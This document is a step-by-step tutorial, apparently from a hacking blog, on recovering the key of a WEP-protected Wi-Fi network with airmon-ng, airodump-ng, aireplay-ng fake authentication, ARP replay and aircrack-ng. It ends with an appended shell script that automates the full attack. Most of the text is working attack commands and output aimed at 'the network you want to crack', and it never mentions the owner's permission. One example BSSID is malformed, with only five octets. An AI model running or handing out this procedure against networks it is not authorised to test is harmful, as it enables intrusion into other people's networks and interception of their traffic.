This tutorial walks you through cracking a WEP-secured wireless network step by step. WEP is easy to crack: its 24-bit initialization vectors (IVs) repeat quickly and leak information about the RC4 key, and aircrack-ng recovers the key statistically from a large enough collection of captured IVs. Not many WEP-secured routers are found nowadays, because almost everybody has moved to WPA/WPA2-PSK, so after reading this post I strongly advise you to change your own wireless security setting to WPA2-PSK. Let us start the guide on how to crack a WEP network password.
What You’ll need
The process is quite simple and anyone can do it, but you have to be patient: collecting enough traffic can take an hour or so.
- BackTrack OS. BackTrack is a bootable Linux distribution with lots of pen-testing tools and is needed for almost all my tutorials. If you have not installed it yet, please read this article on how to install it.
- A compatible wireless network adapter. If you are live-booting BackTrack the internal adapter may work, but I recommend an external adapter whose driver supports monitor mode and packet injection, since both are required below.
Let’s get started
Step 1: Boot into BackTrack.
You can boot into BackTrack any way you like: live CD, VMware, dual boot, etc. Boot into GUI mode and open a new console (command line) from the taskbar.
Note: To attach your wireless card to a VMware guest, plug it into a USB port; a small USB icon then appears at the top right of the VMware window, as in the figure below. Right-click it and choose Connect. The USB icon turns green once the device is attached to the guest.
Step 2: Execute the below command to see the list of your network interfaces.
airmon-ng
My wireless interface was wlan0 and yours will probably be the same. Note the interface name.
Step 3: Enable the monitor mode.
To enable monitor mode, run the following command, where (interface) is your wireless interface name, e.g. wlan0:
airmon-ng start (interface)
Step 4: Let’s start airodump
Now we have successfully started our wireless card in monitor mode. airmon-ng prints the name of the monitor interface it created (mon0 here); use that name, not wlan0, in the commands that follow. To scan for wireless networks, run:
airodump-ng mon0
Here you will see all the wireless networks in range. Note the BSSID and channel (CH) of the ESSID (wireless network) you want to crack, and check that its ENC column says WEP. The PWR column is the signal level in dBm: a value closer to zero (say -40 rather than -80) means a stronger signal, i.e. you are closer to that network. Once you have found it, hit Ctrl+C to stop the scan and enter the following:
airodump-ng --bssid (AP BSSID address) -c (channel no) -w (file name prefix to save the capture with) (monitor interface)
And, in my case it will be
airodump-ng --bssid 54:E6:FC:F0:FC -c 1 -w Ehackwifi mon0
Then the screen will look like this:
NOTE: This attack works best if a STATION (a connected client) appears in the lower half of the next screen and the #Data column is increasing. It is not compulsory, but if you cannot crack the key I recommend waiting for a client to connect: the ARP replay in Step 7 needs to capture a real ARP request before it has anything to replay.
Step 5: Packet Injection test
This step is optional; it checks whether your card can inject packets at all and how good the link between your card and the AP is. To do so, enter the following:
aireplay-ng -9 -e (essid) -a (AP BSSID address) mon0
If everything is right it should print something like:
09:23:35 Waiting for beacon frame (BSSID: 11:22:33:44:55:66) on channel 1
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP
09:23:37 Trying directed probe requests...
09:23:37 11:22:33:44:55:66 - channel: 1 - 'essid'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%
Look at the last line: it should say 100% or close to it. If the percentage is low you are either too far from the AP or too close to it; if it is zero, injection will not work.
Step 6: Let’s do a fake authentication to associate with AP
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. The lack of association with the access point is the single biggest reason why injection fails.
So, in a new console, enter the following to fake-authenticate and get associated. The source MAC used for injection must be your card's real MAC address (if you have spoofed it, give aireplay-ng the same address with its -h option); otherwise the AP will not accept the association.
aireplay-ng -1 0 -e (essid) -a (AP BSSID address) mon0
A successful attempt looks like the following picture.
A failed authentication looks like this:
18:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request
Look at the "Got a deauthentication packet" line and the continuous retries that follow it. Do not proceed to the next step until fake authentication is working correctly. In the airodump-ng screen, the AUTH column for the AP shows OPN once you are successfully associated, as shown in the figure.
Step 7: ARP request replay mode
The purpose of this step is to start aireplay-ng in a mode that listens for ARP requests and re-injects them into the network. We pick ARP request packets because the AP will normally rebroadcast each one, encrypting it with a new IV. That is exactly our objective: to obtain a large number of IVs in a short period of time.
Open another console and type the following:
aireplay-ng -3 -b (AP BSSID address) mon0
It will now listen for ARP requests and, as soon as it hears one, start re-injecting it. If it sits for a long time without anything to replay, it helps to connect another wireless client to the network (e.g. the laptop's internal card, with any password) or to send deauthentication packets to a client that is already connected: a client that joins or rejoins the network usually sends an ARP request within seconds, which gives aireplay-ng the packet it needs. The screen should look like the following once injection starts:
You will notice the #Data column in the airodump-ng screen increasing rapidly. The more IVs you collect, the better: a 64-bit key usually falls with about 20,000 IVs, a 128-bit key can need 40,000 or more, so 50,000 is comfortably enough, but you can already try cracking at 20,000, which is what we do in the next step.
Note: If you receive a message similar to "Got a deauth/disassoc packet. Is the source mac associated?", you have lost association with the AP and all your injected packets are being ignored. Return to the fake authentication step (Step 6) and associate with the AP again.
Final Step: Aircrack-ng to obtain WEP key
Now that you have collected a lot of data you can start the cracking process. Keep the ARP replay console running so that more data keeps coming in if there is not enough yet. Enter the following to start cracking:
aircrack-ng -b (bssid) (file name-01.cap)
Here, file name is the prefix you gave with "-w" in the airodump-ng command in Step 4; airodump-ng appends "-01.cap" by default (the number goes up each time you restart a capture with the same prefix). You can also find the file by typing ls in a new console.
If everything worked, aircrack-ng will try to crack the key as shown in the figure and after a few moments display KEY FOUND!. If not, it will ask for more data, so leave the ARP replay console open to collect more quickly, and hit Ctrl+C once the key is found. When entering the key into a client, drop the ":" separators from the hex form, or enter the ASCII form directly if aircrack-ng prints one. Hope you like this tutorial; please share and comment.
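The whole procedure as one script, an added example that is not part of the original tutorial: it wraps the commands from Step 3 through the final step and adds the check the tutorial does by eye, reading the "# IV" column of the CSV that airodump-ng writes next to the .cap (prefix-01.csv) so that aircrack-ng is only started once enough IVs are in. The interface names, the -w prefix, the 20,000 IV threshold and the CSV column order are assumptions made here, not taken from the page.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: the steps above wrapped
# in one script. Assumptions (not from the page): the interface names, the
# -w prefix, the IV threshold and the column layout of the airodump-ng CSV.

IFACE="${IFACE:-wlan0}"        # managed interface reported by airmon-ng (Step 2)
MON="${MON:-mon0}"             # monitor interface created by "airmon-ng start"
PREFIX="${PREFIX:-Ehackwifi}"  # -w prefix from Step 4; airodump-ng appends -01
MIN_IVS="${MIN_IVS:-20000}"    # IVs to collect before trying aircrack-ng

# Print the "# IV" column for one BSSID from the PREFIX-01.csv that airodump-ng
# writes next to the .cap. The AP table comes first; the client table starts
# at the "Station MAC" header. Prints 0 if the file or the BSSID is missing.
iv_count() {
    csv="$1"; bssid="$2"
    [ -r "$csv" ] || { echo 0; return 0; }
    awk -F', *' -v b="$bssid" '
        /^Station MAC/            { exit }
        toupper($1) == toupper(b) { print $11; found = 1; exit }
        END                       { if (!found) print 0 }
    ' "$csv"
}

# Succeeds once the capture holds at least MIN_IVS IVs for the target AP.
enough_ivs() {
    [ "$(iv_count "$1" "$2")" -ge "$MIN_IVS" ]
}

# Steps 3 and 4: monitor mode, then capture only the target channel and BSSID.
start_capture() {
    bssid="$1"; chan="$2"
    airmon-ng start "$IFACE"
    airodump-ng --bssid "$bssid" -c "$chan" -w "$PREFIX" "$MON" &
}

# Steps 6 and 7: fake-authenticate, then replay captured ARP requests.
# Fake auth must succeed first, otherwise the AP drops every injected frame.
inject() {
    essid="$1"; bssid="$2"
    aireplay-ng -1 0 -e "$essid" -a "$bssid" "$MON" || return 1
    aireplay-ng -3 -b "$bssid" "$MON" &
}

# Final step: poll the CSV until enough IVs are in, then run aircrack-ng.
crack() {
    bssid="$1"
    while ! enough_ivs "$PREFIX-01.csv" "$bssid"; do
        sleep 10
    done
    aircrack-ng -b "$bssid" "$PREFIX-01.cap"
}

main() {
    [ "$#" -eq 3 ] || { echo "usage: $0 ESSID BSSID CHANNEL" >&2; return 2; }
    start_capture "$2" "$3"
    sleep 5                      # give airodump-ng time to create its files
    inject "$1" "$2" || { echo "fake authentication failed" >&2; return 1; }
    crack "$2"
}

# Only run the attack when explicitly asked, so the functions can be sourced.
if [ "${WEP_RUN:-0}" = 1 ]; then
    main "$@"
fi
```

Run it as `WEP_RUN=1 sh wepcrack.sh (essid) (AP BSSID address) (channel)`. airodump-ng and aireplay-ng are backgrounded here, so their screens interleave on one console; in practice you will want each in its own console as the tutorial does, and use the script mainly for the iv_count check, which saves watching the #Data column by hand.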